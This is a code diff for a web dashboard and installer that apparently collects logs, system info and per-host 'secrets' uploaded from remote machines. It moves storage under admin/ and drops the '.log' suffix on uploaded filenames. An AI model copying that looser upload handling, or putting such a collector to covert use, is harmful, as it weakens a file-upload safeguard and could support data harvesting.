item.parentNode.style.display = text.includes(query) ? 'block' : 'none';
});
});
}
}
// Setup search functionality if elements exist
setupSearch('hostSearch', '.host-list a');
setupSearch('logSearch', '.log-list a');
// Download button functionality
const downloadBtn = document.getElementById('downloadBtn');
if (downloadBtn) {
downloadBtn.addEventListener('click', function() {
const logContent = document.querySelector('.logs');
if (logContent) {
const content = logContent.innerText;
const blob = new Blob([content], {type: 'text/plain'});
const url = URL.createObjectURL(blob);
const a = document.createElement('a');
a.href = url;
const urlParams = new URLSearchParams(window.location.search);
a.download = urlParams.get('log') || "log";
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
URL.revokeObjectURL(url);
}
});
}
// Refresh button functionality
const refreshBtn = document.getElementById('refreshBtn');
if (refreshBtn) {
refreshBtn.addEventListener('click', function() {
location.reload();
});
}

276
web/admin/styles.css Normal file
View File

@@ -0,0 +1,276 @@
:root {
--bg: #111111;
--text: #33ff33;
--text-dim: #1a991a;
--secondary: #aaaaaa;
--accent: #ff5555;
--border: #333333;
--hover: #222222;
--panel: #191919;
}
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
body {
font-family: 'Courier New', monospace;
background-color: var(--bg);
color: var(--text);
line-height: 1.5;
}
.container {
width: 95%;
max-width: 1400px;
margin: 0 auto;
padding: 10px;
}
.header {
border-bottom: 1px solid var(--border);
padding: 10px 0;
margin-bottom: 20px;
display: flex;
justify-content: space-between;
align-items: center;
}
pre {
font-family: 'Courier New', monospace;
overflow-x: auto;
white-space: pre;
}
.ascii-header {
font-size: 12px;
line-height: 1.2;
}
.logo {
text-decoration: none;
color: var(--text);
}
.logout {
color: var(--text);
text-decoration: none;
border: 1px solid var(--border);
padding: 5px 10px;
}
.logout:hover {
background: var(--hover);
}
.dashboard {
display: flex;
gap: 20px;
}
.sidebar {
width: 280px;
flex-shrink: 0;
}
.content {
flex-grow: 1;
}
.panel {
border: 1px solid var(--border);
background: var(--panel);
margin-bottom: 20px;
}
.panel-header {
border-bottom: 1px solid var(--border);
padding: 10px;
display: flex;
justify-content: space-between;
align-items: center;
}
.host-list, .log-list {
list-style: none;
}
.host-list a, .log-list a, .tab {
display: block;
padding: 8px 10px;
color: var(--secondary);
text-decoration: none;
border-bottom: 1px solid var(--border);
}
.host-list a:hover, .log-list a:hover, .tab:hover {
background: var(--hover);
color: var(--text);
}
.host-list a.active, .log-list a.active, .tab.active {
color: var(--text);
background: rgba(51, 255, 51, 0.1);
}
.tabs {
display: flex;
border-bottom: 1px solid var(--border);
}
.tab {
padding: 8px 15px;
border-right: 1px solid var(--border);
border-bottom: none;
}
.logs {
padding: 10px;
max-height: 600px;
overflow: auto;
white-space: pre-wrap;
font-family: 'Courier New', monospace;
font-size: 14px;
background: rgba(0, 0, 0, 0.2);
}
.log-date {
float: right;
color: var(--text-dim);
font-size: 0.9em;
}
.login {
max-width: 400px;
margin: 50px auto;
padding: 20px;
border: 1px solid var(--border);
background: var(--panel);
}
input[type="password"], .search-box {
width: 100%;
padding: 8px;
margin: 10px 0;
background: var(--bg);
border: 1px solid var(--border);
color: var(--text);
font-family: 'Courier New', monospace;
}
button, .action-btn {
padding: 8px 15px;
background: transparent;
color: var(--text);
border: 1px solid var(--text);
cursor: pointer;
font-family: 'Courier New', monospace;
}
button:hover, .action-btn:hover {
background: rgba(51, 255, 51, 0.1);
}
.welcome {
text-align: center;
padding: 50px 20px;
color: var(--secondary);
}
.secrets {
padding: 10px;
}
.secret {
margin-bottom: 10px;
border: 1px solid var(--border);
background: rgba(255, 255, 0, 0.05);
}
.secret-title {
border-bottom: 1px dashed var(--border);
padding: 5px 8px;
font-size: 0.9em;
color: var(--text-dim);
}
.command {
padding: 8px;
position: relative;
overflow-x: auto;
white-space: pre;
font-family: 'Courier New', monospace;
}
.copy-btn {
position: absolute;
right: 5px;
top: 5px;
background: transparent;
color: var(--secondary);
border: 1px solid var(--border);
padding: 2px 5px;
cursor: pointer;
font-size: 12px;
width: auto;
}
.copy-btn:hover {
background: var(--hover);
color: var(--text);
}
.alert {
border-left: 3px solid var(--accent);
padding: 10px;
margin-bottom: 15px;
color: var(--accent);
}
.system-info {
padding: 10px;
}
.info-table {
width: 100%;
border-collapse: collapse;
}
.info-table tr {
border-bottom: 1px solid var(--border);
}
.info-table td {
padding: 8px 10px;
}
.info-label {
color: var(--secondary);
width: 150px;
}
.action-btn {
padding: 3px 8px;
font-size: 12px;
margin-left: 5px;
}
@media (max-width: 800px) {
.dashboard {
flex-direction: column;
}
.sidebar {
width: 100%;
}
.ascii-header {
font-size: 10px;
}
.tabs {
flex-wrap: wrap;
}
}

View File

@@ -213,7 +213,7 @@
</div>
<h2>> admin</h2>
<a href="admin.php" class="admin-link">$ access admin panel</a>
<a href="admin/admin.php" class="admin-link">$ access admin panel</a>
</body>
<script>

View File

@@ -4,8 +4,8 @@
// Configuration
$auth_token = "TOKEN_PLACEHOLDER"; // Will be replaced during installation
$logs_dir = __DIR__ . "/logs";
$secrets_dir = __DIR__ . "/secrets";
$logs_dir = __DIR__ . "/admin/logs";
$secrets_dir = __DIR__ . "/admin/secrets";
// Verify authentication token
if (!isset($_POST['auth_token']) || $_POST['auth_token'] !== $auth_token) {
@@ -33,7 +33,7 @@ if (!file_exists($host_secrets_dir)) {
// Process the file upload if available
if (isset($_FILES['log_data']) && $_FILES['log_data']['error'] === UPLOAD_ERR_OK) {
$log_file = $host_logs_dir . "/" . $timestamp . "_" . sanitize_filename($_FILES['log_data']['name']) . ".log";
$log_file = $host_logs_dir . "/" . $timestamp . "_" . sanitize_filename($_FILES['log_data']['name']);
if (move_uploaded_file($_FILES['log_data']['tmp_name'], $log_file)) {
// Process system info if provided
if (!empty($system_info)) {

View File

@@ -5,42 +5,42 @@ setup_web_server() {
echo "Setting up web server..."
# Create necessary directories
sudo mkdir -p "$SERVER_ROOT/logs"
sudo mkdir -p "$SERVER_ROOT/secrets"
sudo mkdir -p "$SERVER_ROOT/admin/logs"
sudo mkdir -p "$SERVER_ROOT/admin/secrets"
# Set correct permissions
case "$DISTRO" in
arch)
sudo chown -R http:http "$SERVER_ROOT/logs"
sudo chown -R http:http "$SERVER_ROOT/secrets"
sudo chown -R http:http "$SERVER_ROOT/admin/logs"
sudo chown -R http:http "$SERVER_ROOT/admin/secrets"
;;
debian|ubuntu)
sudo chown -R www-data:www-data "$SERVER_ROOT/logs"
sudo chown -R www-data:www-data "$SERVER_ROOT/secrets"
sudo chown -R www-data:www-data "$SERVER_ROOT/admin/logs"
sudo chown -R www-data:www-data "$SERVER_ROOT/admin/secrets"
;;
redhat|fedora|centos)
sudo chown -R apache:apache "$SERVER_ROOT/logs"
sudo chown -R apache:apache "$SERVER_ROOT/secrets"
sudo chown -R apache:apache "$SERVER_ROOT/admin/logs"
sudo chown -R apache:apache "$SERVER_ROOT/admin/secrets"
;;
*)
# Try to guess the web server user
if id -u http &>/dev/null; then
sudo chown -R http:http "$SERVER_ROOT/logs"
sudo chown -R http:http "$SERVER_ROOT/secrets"
sudo chown -R http:http "$SERVER_ROOT/admin/logs"
sudo chown -R http:http "$SERVER_ROOT/admin/secrets"
elif id -u www-data &>/dev/null; then
sudo chown -R www-data:www-data "$SERVER_ROOT/logs"
sudo chown -R www-data:www-data "$SERVER_ROOT/secrets"
sudo chown -R www-data:www-data "$SERVER_ROOT/admin/logs"
sudo chown -R www-data:www-data "$SERVER_ROOT/admin/secrets"
elif id -u apache &>/dev/null; then
sudo chown -R apache:apache "$SERVER_ROOT/logs"
sudo chown -R apache:apache "$SERVER_ROOT/secrets"
sudo chown -R apache:apache "$SERVER_ROOT/admin/logs"
sudo chown -R apache:apache "$SERVER_ROOT/admin/secrets"
else
echo "Warning: Could not determine web server user. Setting default permissions."
fi
;;
esac
sudo chmod 750 "$SERVER_ROOT/logs"
sudo chmod 750 "$SERVER_ROOT/secrets"
sudo chmod 750 "$SERVER_ROOT/admin/logs"
sudo chmod 750 "$SERVER_ROOT/admin/secrets"
# Copy web files
copy_web_files
@@ -55,14 +55,14 @@ copy_web_files() {
# Update configurations in files
sudo sed -i "s/TOKEN_PLACEHOLDER/$SECRET_TOKEN/g" "$SERVER_ROOT/log_receiver.php"
sudo sed -i "s/ADMIN_PASSWORD_PLACEHOLDER/$ADMIN_PASSWORD/g" "$SERVER_ROOT/admin.php"
sudo sed -i "s/ADMIN_PASSWORD_PLACEHOLDER/$ADMIN_PASSWORD/g" "$SERVER_ROOT/admin/admin.php"
# Update Server IP in the HTML files
sudo sed -i "s/SERVER_IP/$SERVER_IP/g" "$SERVER_ROOT/index.html"
sudo sed -i "s/SERVER_IP/$SERVER_IP/g" "$SERVER_ROOT/admin.php"
sudo sed -i "s/SERVER_IP/$SERVER_IP/g" "$SERVER_ROOT/admin/admin.php"
# Set proper permissions
sudo chmod 644 "$SERVER_ROOT/admin.php"
sudo chmod 644 "$SERVER_ROOT/admin/admin.php"
sudo chmod 644 "$SERVER_ROOT/log_receiver.php"
}
configure_webserver() {
@@ -98,11 +98,11 @@ configure_apache_arch() {
Require all granted
</Directory>
<Directory "$SERVER_ROOT/logs">
<Directory "$SERVER_ROOT/admin/logs">
Require all denied
</Directory>
<Directory "$SERVER_ROOT/secrets">
<Directory "$SERVER_ROOT/admin/secrets">
Require all denied
</Directory>
@@ -140,11 +140,11 @@ configure_apache_debian() {
Require all granted
</Directory>
<Directory "$SERVER_ROOT/logs">
<Directory "$SERVER_ROOT/admin/logs">
Require all denied
</Directory>
<Directory "$SERVER_ROOT/secrets">
<Directory "$SERVER_ROOT/admin/secrets">
Require all denied
</Directory>
@@ -178,11 +178,11 @@ configure_apache_redhat() {
Require all granted
</Directory>
<Directory "$SERVER_ROOT/logs">
<Directory "$SERVER_ROOT/admin/logs">
Require all denied
</Directory>
<Directory "$SERVER_ROOT/secrets">
<Directory "$SERVER_ROOT/admin/secrets">
Require all denied
</Directory>
@@ -194,6 +194,5 @@ EOF
sudo mv "$TEMP_DIR/deployment.conf" /etc/httpd/conf.d/deployment.conf
# Start/restart Apache
sudo systemctl enable httpd
sudo systemctl restart httpd
}